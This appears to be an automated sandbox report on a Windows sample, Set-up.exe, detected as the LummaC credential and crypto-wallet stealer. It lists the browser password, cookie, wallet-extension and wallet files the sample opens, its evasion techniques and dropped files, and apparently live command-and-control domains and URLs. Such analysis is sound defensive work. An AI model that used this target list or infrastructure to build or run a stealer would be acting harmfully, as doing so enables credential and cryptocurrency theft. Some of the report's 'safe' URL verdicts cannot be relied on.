              Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopgJump to behavior
              Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoaJump to behavior
              Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdphJump to behavior
              Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkldJump to behavior
              Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolafJump to behavior
              Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\oeljdldpnmdbchonielidgobddffflaJump to behavior
              Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnidJump to behavior
              Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfciJump to behavior
              Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjehJump to behavior
              Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemgJump to behavior
              Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhaeJump to behavior
              Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\key4.dbJump to behavior
              Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliofJump to behavior
              Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneecJump to behavior
              Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmonJump to behavior
              Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhmJump to behavior
              Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcmJump to behavior
              Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\ilgcnhelpchnceeipipijaljkblbcobJump to behavior
              Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjhJump to behavior
              Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\abogmiocnneedmmepnohnhlijcjpcifdJump to behavior
              Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflcJump to behavior
              Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbgJump to behavior
              Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
              Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahdJump to behavior
              Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhkJump to behavior
              Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbaiJump to behavior
              Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\HistoryJump to behavior
              Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgnJump to behavior
              Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpiJump to behavior
              Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqliteJump to behavior
              Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifbJump to behavior
              Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgkJump to behavior
              Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbaiJump to behavior
              Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkdJump to behavior
              Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For AccountJump to behavior
              Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimnJump to behavior
              Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfjJump to behavior
              Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohaoJump to behavior
              Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For AccountJump to behavior
              Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjkJump to behavior
              Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cpojfbodiccabbabgimdeohkkpjfpbnfJump to behavior
              Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofecJump to behavior
              Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihdJump to behavior
              Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcjeJump to behavior
              Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaocJump to behavior
              Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdnoJump to behavior
              Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdafJump to behavior
              Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cert9.dbJump to behavior
              Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkmJump to behavior
              Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\formhistory.sqliteJump to behavior
              Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbicJump to behavior
              Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoaddJump to behavior
              Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhiJump to behavior
              Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeapJump to behavior
              Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihohJump to behavior
              Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpaJump to behavior
              Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbnJump to behavior
              Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaadJump to behavior
              Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\logins.jsonJump to behavior
              Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilcJump to behavior
              Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclgJump to behavior
              Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchhJump to behavior
              Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoaJump to behavior
              Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
              Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknnJump to behavior
              Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfddJump to behavior
              Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jiidiaalihmmhddjgbnbgdfflelocpakJump to behavior
              Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjpJump to behavior
              Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpoJump to behavior
              Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgppJump to behavior
              Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqliteJump to behavior
              Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\ProfilesJump to behavior
              Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblbJump to behavior
              Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbchJump to behavior
              Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbmJump to behavior
              Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbchJump to behavior
              Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfeJump to behavior
              Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmjJump to behavior
              Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffneJump to behavior
              Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklkJump to behavior
              Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdmaJump to behavior
              Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdilJump to behavior
              Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapacJump to behavior
              Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnknoJump to behavior
              Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimigJump to behavior
              Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncgJump to behavior
              Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolbJump to behavior
              Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcobJump to behavior
              Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnbaJump to behavior
              Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddffflaJump to behavior
              Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjihJump to behavior
              Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcgeJump to behavior
              Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgikJump to behavior
              Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhadJump to behavior
              Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgefJump to behavior
              Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbbJump to behavior
              Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkpJump to behavior
              Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
              Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcelljJump to behavior
              Tries to harvest and steal ftp login credentials
              Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Roaming\Conceptworld\NotezillaJump to behavior
              Tries to steal Crypto Currency Wallets
              Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
              Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
              Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Roaming\Ledger LiveJump to behavior
              Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldbJump to behavior
              Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
              Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
              Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Roaming\Bitcoin\walletsJump to behavior
              Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Roaming\BinanceJump to behavior
              Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDBJump to behavior
              Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\walletsJump to behavior
              Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\walletsJump to behavior
              Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDBJump to behavior
              Source: C:\Users\user\Desktop\Set-up.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
              Source: C:\Users\user\Desktop\Set-up.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
              Source: C:\Users\user\Desktop\Set-up.exeDirectory queried: C:\Users\user\Documents\FENIVHOIKNJump to behavior
              Source: C:\Users\user\Desktop\Set-up.exeDirectory queried: C:\Users\user\Documents\FENIVHOIKNJump to behavior
              Source: Yara matchFile source: 00000000.00000003.1855025285.000000000065D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: Set-up.exe PID: 3492, type: MEMORYSTR

              Remote Access Functionality

              barindex
              Yara detected LummaC Stealer
              Source: Yara matchFile source: Process Memory Space: Set-up.exe PID: 3492, type: MEMORYSTR
              Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
              Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR

              Mitre Att&ck Matrix

              ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
              Gather Victim Identity InformationAcquire InfrastructureValid Accounts121
              Windows Management Instrumentation              		1
              DLL Side-Loading              		12
              Process Injection              		1
              Masquerading              		2
              OS Credential Dumping              		1
              System Time Discovery              		Remote Services1
              Archive Collected Data              		11
              Encrypted Channel              		Exfiltration Over Other Network MediumAbuse Accessibility Features
              CredentialsDomainsDefault Accounts12
              Command and Scripting Interpreter              		Boot or Logon Initialization Scripts1
              Abuse Elevation Control Mechanism              		221
              Virtualization/Sandbox Evasion              		LSASS Memory521
              Security Software Discovery              		Remote Desktop Protocol41
              Data from Local System              		1
              Ingress Tool Transfer              		Exfiltration Over BluetoothNetwork Denial of Service
              Email AddressesDNS ServerDomain Accounts2
              PowerShell              		Logon Script (Windows)1
              DLL Side-Loading              		12
              Process Injection              		Security Account Manager221
              Virtualization/Sandbox Evasion              		SMB/Windows Admin SharesData from Network Shared Drive3
              Non-Application Layer Protocol              		Automated ExfiltrationData Encrypted for Impact
              Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook11
              Deobfuscate/Decode Files or Information              		NTDS4
              Process Discovery              		Distributed Component Object ModelInput Capture114
              Application Layer Protocol              		Traffic DuplicationData Destruction
              Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
              Abuse Elevation Control Mechanism              		LSA Secrets1
              Application Window Discovery              		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
              Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts3
              Obfuscated Files or Information              		Cached Domain Credentials2
              System Owner/User Discovery              		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
              DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
              DLL Side-Loading              		DCSync11
              File and Directory Discovery              		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
              Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/JobIndicator Removal from ToolsProc Filesystem224
              System Information Discovery              		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement

              Behavior Graph

              Hide Legend

              Legend:

              • Process
              • Signature
              • Created File
              • DNS/IP Info
              • Is Dropped
              • Is Windows Process
              • Number of created Registry Values
              • Number of created Files
              • Visual Basic
              • Delphi
              • Java
              • .Net C# or VB.NET
              • C, C++ or other language
              • Is malicious
              • Internet
              behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1584522 Sample: Set-up.exe Startdate: 05/01/2025 Architecture: WINDOWS Score: 100 80 cellardesiresso.sbs 2->80 82 klipvumisui.shop 2->82 84 cegu.shop 2->84 102 Suricata IDS alerts for network traffic 2->102 104 Found malware configuration 2->104 106 Malicious sample detected (through community Yara rule) 2->106 108 9 other signatures 2->108 12 Set-up.exe 1 2->12         started        signatures3 process4 dnsIp5 86 cellardesiresso.sbs 104.21.87.8, 443, 49748, 49749 CLOUDFLARENETUS United States 12->86 88 cegu.shop 185.161.251.21, 443, 49757 NTLGB United Kingdom 12->88 90 klipvumisui.shop 172.67.208.58, 443, 49758 CLOUDFLARENETUS United States 12->90 70 C:\Users\user\...\PU6S498VOPMOZVY2Y7.exe, PE32 12->70 dropped 112 Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines) 12->112 114 Suspicious powershell command line found 12->114 116 Query firmware table information (likely to detect VMs) 12->116 118 4 other signatures 12->118 17 PU6S498VOPMOZVY2Y7.exe 2 12->17         started        21 powershell.exe 7 12->21         started        file6 signatures7 process8 file9 62 C:\Users\user\...\PU6S498VOPMOZVY2Y7.tmp, PE32 17->62 dropped 92 Multi AV Scanner detection for dropped file 17->92 23 PU6S498VOPMOZVY2Y7.tmp 3 5 17->23         started        26 conhost.exe 21->26         started        signatures10 process11 file12 64 C:\Users\user\AppData\Local\...\_isdecmp.dll, PE32 23->64 dropped 66 C:\Users\user\AppData\Local\...\_setup64.tmp, PE32+ 23->66 dropped 28 PU6S498VOPMOZVY2Y7.exe 2 23->28         started        process13 file14 68 C:\Users\user\...\PU6S498VOPMOZVY2Y7.tmp, PE32 28->68 dropped 31 PU6S498VOPMOZVY2Y7.tmp 5 7 28->31         started        process15 file16 72 C:\Users\user\AppData\...\is-1H7IE.tmp, PE32 31->72 dropped 74 C:\Users\user\...\BrightLib.exe (copy), PE32 31->74 dropped 76 C:\Users\user\AppData\Local\...\_isdecmp.dll, PE32 31->76 dropped 78 C:\Users\user\AppData\Local\...\_setup64.tmp, PE32+ 31->78 dropped 34 BrightLib.exe 31->34         started        37 cmd.exe 1 31->37         started        39 cmd.exe 1 31->39         started        41 5 other processes 31->41 process17 signatures18 94 Tries to detect virtualization through RDTSC time measurements 34->94 96 Sample or dropped binary is a compiled AutoHotkey binary 34->96 98 Switches to a custom stack to bypass stack traces 34->98 100 Found direct / indirect Syscall (likely to bypass EDR) 34->100 43 find.exe 1 37->43         started        46 conhost.exe 37->46         started        48 tasklist.exe 1 37->48         started        50 conhost.exe 39->50         started        58 2 other processes 39->58 52 conhost.exe 41->52         started        54 conhost.exe 41->54         started        56 tasklist.exe 1 41->56         started        60 10 other processes 41->60 process19 signatures20 110 Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines) 43->110

              Screenshots

              Thumbnails

              This section contains all screenshots as thumbnails, including those not shown in the slideshow.


              windows-stand

              Antivirus, Machine Learning and Genetic Malware Detection

              Initial Sample

              SourceDetectionScannerLabelLink
              Set-up.exe18%ReversingLabsWin32.Trojan.Generic
              Set-up.exe17%VirustotalBrowse

              Dropped Files

              SourceDetectionScannerLabelLink
              C:\Users\user\AppData\Local\Temp\PU6S498VOPMOZVY2Y7.exe74%ReversingLabsWin32.Spyware.Lummastealer
              C:\Users\user\AppData\Local\Temp\is-16TGC.tmp\_isetup\_isdecmp.dll0%ReversingLabs
              C:\Users\user\AppData\Local\Temp\is-16TGC.tmp\_isetup\_setup64.tmp0%ReversingLabs
              C:\Users\user\AppData\Local\Temp\is-2S59A.tmp\_isetup\_isdecmp.dll0%ReversingLabs
              C:\Users\user\AppData\Local\Temp\is-2S59A.tmp\_isetup\_setup64.tmp0%ReversingLabs
              C:\Users\user\AppData\Local\Temp\is-BFJG4.tmp\PU6S498VOPMOZVY2Y7.tmp0%ReversingLabs
              C:\Users\user\AppData\Local\Temp\is-O0509.tmp\PU6S498VOPMOZVY2Y7.tmp0%ReversingLabs
              C:\Users\user\AppData\Roaming\ColorStreamLib\BrightLib.exe (copy)8%ReversingLabs
              C:\Users\user\AppData\Roaming\ColorStreamLib\is-1H7IE.tmp8%ReversingLabs

              Unpacked PE Files

              No Antivirus matches

              Domains

              No Antivirus matches

              URLs

              SourceDetectionScannerLabelLink
              https://cellardesiresso.sbs/api0%Avira URL Cloudsafe
              https://cellardesiresso.sbs/apipi0%Avira URL Cloudsafe
              https://cellardesiresso.sbs/apiD0%Avira URL Cloudsafe
              https://cellardesiresso.sbs/apiod0%Avira URL Cloudsafe
              http://michaeluno.jp/40%Avira URL Cloudsafe
              https://cellardesiresso.sbs/apiQ0%Avira URL Cloudsafe
              https://cellardesiresso.sbs/bu0%Avira URL Cloudsafe
              https://cellardesiresso.sbs/apiaFP0%Avira URL Cloudsafe
              https://cegu.shop/8574262446/ph.txts100%Avira URL Cloudmalware
              https://klipvumisui.shop/int_clp_sha.txts;100%Avira URL Cloudmalware
              https://cellardesiresso.sbs/0%Avira URL Cloudsafe
              https://klipvumisui.shop/int_clp_sha.txt8100%Avira URL Cloudmalware
              https://dfgh.online/invoker.php?compName=hZ100%Avira URL Cloudmalware
              https://cellardesiresso.sbs/10%Avira URL Cloudsafe
              cellardesiresso.sbs0%Avira URL Cloudsafe
              https://cellardesiresso.sbs:443/api0%Avira URL Cloudsafe
              https://cellardesiresso.sbs/apiay0%Avira URL Cloudsafe
              http://michaeluno.jp/h0%Avira URL Cloudsafe
